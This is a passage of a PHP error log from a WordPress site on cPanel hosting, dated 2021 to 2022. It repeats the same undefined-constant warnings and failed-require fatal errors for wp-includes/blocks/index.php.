/home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [25-Nov-2021 21:39:01 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [25-Nov-2021 23:33:30 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [25-Nov-2021 23:33:30 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [25-Nov-2021 23:33:30 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [25-Nov-2021 23:33:30 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [29-Nov-2021 03:47:50 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [29-Nov-2021 03:47:50 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [29-Nov-2021 03:47:50 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [29-Nov-2021 03:47:50 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [01-Dec-2021 07:17:00 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [01-Dec-2021 07:17:00 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [01-Dec-2021 07:17:00 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [01-Dec-2021 07:17:00 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [14-Dec-2021 21:43:18 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [14-Dec-2021 21:43:18 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [14-Dec-2021 21:43:18 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [14-Dec-2021 21:43:18 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [25-Dec-2021 18:24:37 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [25-Dec-2021 18:24:37 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [25-Dec-2021 18:24:37 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [25-Dec-2021 18:24:37 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [29-Dec-2021 09:54:47 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [29-Dec-2021 09:54:47 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [29-Dec-2021 09:54:47 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [29-Dec-2021 09:54:47 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [28-Jan-2022 12:55:44 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [28-Jan-2022 12:55:44 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [28-Jan-2022 12:55:44 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [28-Jan-2022 12:55:44 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [10-Feb-2022 07:20:23 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [10-Feb-2022 07:20:23 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [10-Feb-2022 07:20:23 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [10-Feb-2022 07:20:23 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [06-Mar-2022 06:47:50 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [06-Mar-2022 06:47:50 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [06-Mar-2022 06:47:50 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [06-Mar-2022 06:47:50 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [08-Mar-2022 11:41:32 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [08-Mar-2022 11:41:32 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [08-Mar-2022 11:41:32 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [08-Mar-2022 11:41:32 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [28-Mar-2022 13:15:15 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [28-Mar-2022 13:15:15 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [28-Mar-2022 13:15:15 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [28-Mar-2022 13:15:15 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [31-Mar-2022 20:28:31 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [31-Mar-2022 20:28:31 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [31-Mar-2022 20:28:31 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [31-Mar-2022 20:28:31 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [25-Apr-2022 16:10:35 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [25-Apr-2022 16:10:35 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [25-Apr-2022 16:10:35 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [25-Apr-2022 16:10:35 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [30-Apr-2022 19:41:47 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [30-Apr-2022 19:41:47 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [30-Apr-2022 19:41:47 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [30-Apr-2022 19:41:47 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [04-May-2022 18:48:19 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [04-May-2022 18:48:19 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [04-May-2022 18:48:19 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [04-May-2022 18:48:19 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [13-May-2022 03:47:52 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [13-May-2022 03:47:52 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [13-May-2022 03:47:52 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [13-May-2022 03:47:52 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [26-May-2022 16:07:18 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [26-May-2022 16:07:18 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [26-May-2022 16:07:18 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [26-May-2022 16:07:18 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [29-May-2022 19:33:06 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [29-May-2022 19:33:06 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [29-May-2022 19:33:06 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [29-May-2022 19:33:06 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [30-May-2022 11:34:25 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [30-May-2022 11:34:25 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [30-May-2022 11:34:25 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [30-May-2022 11:34:25 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [31-May-2022 00:10:29 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [31-May-2022 00:10:29 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [31-May-2022 00:10:29 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [31-May-2022 00:10:29 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [04-Jun-2022 09:10:31 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [04-Jun-2022 09:10:31 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [04-Jun-2022 09:10:31 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [04-Jun-2022 09:10:31 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [07-Jun-2022 11:46:43 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [07-Jun-2022 11:46:43 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [07-Jun-2022 11:46:43 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [07-Jun-2022 11:46:43 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [11-Jun-2022 18:08:21 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [11-Jun-2022 18:08:21 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [11-Jun-2022 18:08:21 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [11-Jun-2022 18:08:21 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [13-Jun-2022 05:43:02 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [13-Jun-2022 05:43:02 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [13-Jun-2022 05:43:02 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [13-Jun-2022 05:43:02 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [13-Jun-2022 11:56:37 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [13-Jun-2022 11:56:37 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [13-Jun-2022 11:56:37 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [13-Jun-2022 11:56:37 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [18-Jun-2022 19:36:49 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [18-Jun-2022 19:36:49 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [18-Jun-2022 19:36:49 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [18-Jun-2022 19:36:49 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [27-Jun-2022 09:24:57 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [27-Jun-2022 09:24:57 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [27-Jun-2022 09:24:57 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [27-Jun-2022 09:24:57 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [09-Jul-2022 22:49:15 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [09-Jul-2022 22:49:15 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [09-Jul-2022 22:49:15 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [09-Jul-2022 22:49:15 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [16-Jul-2022 18:30:34 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [16-Jul-2022 18:30:34 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [16-Jul-2022 18:30:34 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [16-Jul-2022 18:30:34 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [28-Jul-2022 23:33:04 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [28-Jul-2022 23:33:04 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [28-Jul-2022 23:33:04 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [28-Jul-2022 23:33:04 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [03-Aug-2022 06:03:13 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [03-Aug-2022 06:03:13 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [03-Aug-2022 06:03:13 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [03-Aug-2022 06:03:13 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [07-Aug-2022 00:48:04 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [07-Aug-2022 00:48:04 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [07-Aug-2022 00:48:04 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [07-Aug-2022 00:48:04 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [17-Aug-2022 09:56:14 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [17-Aug-2022 09:56:14 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [17-Aug-2022 09:56:14 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory 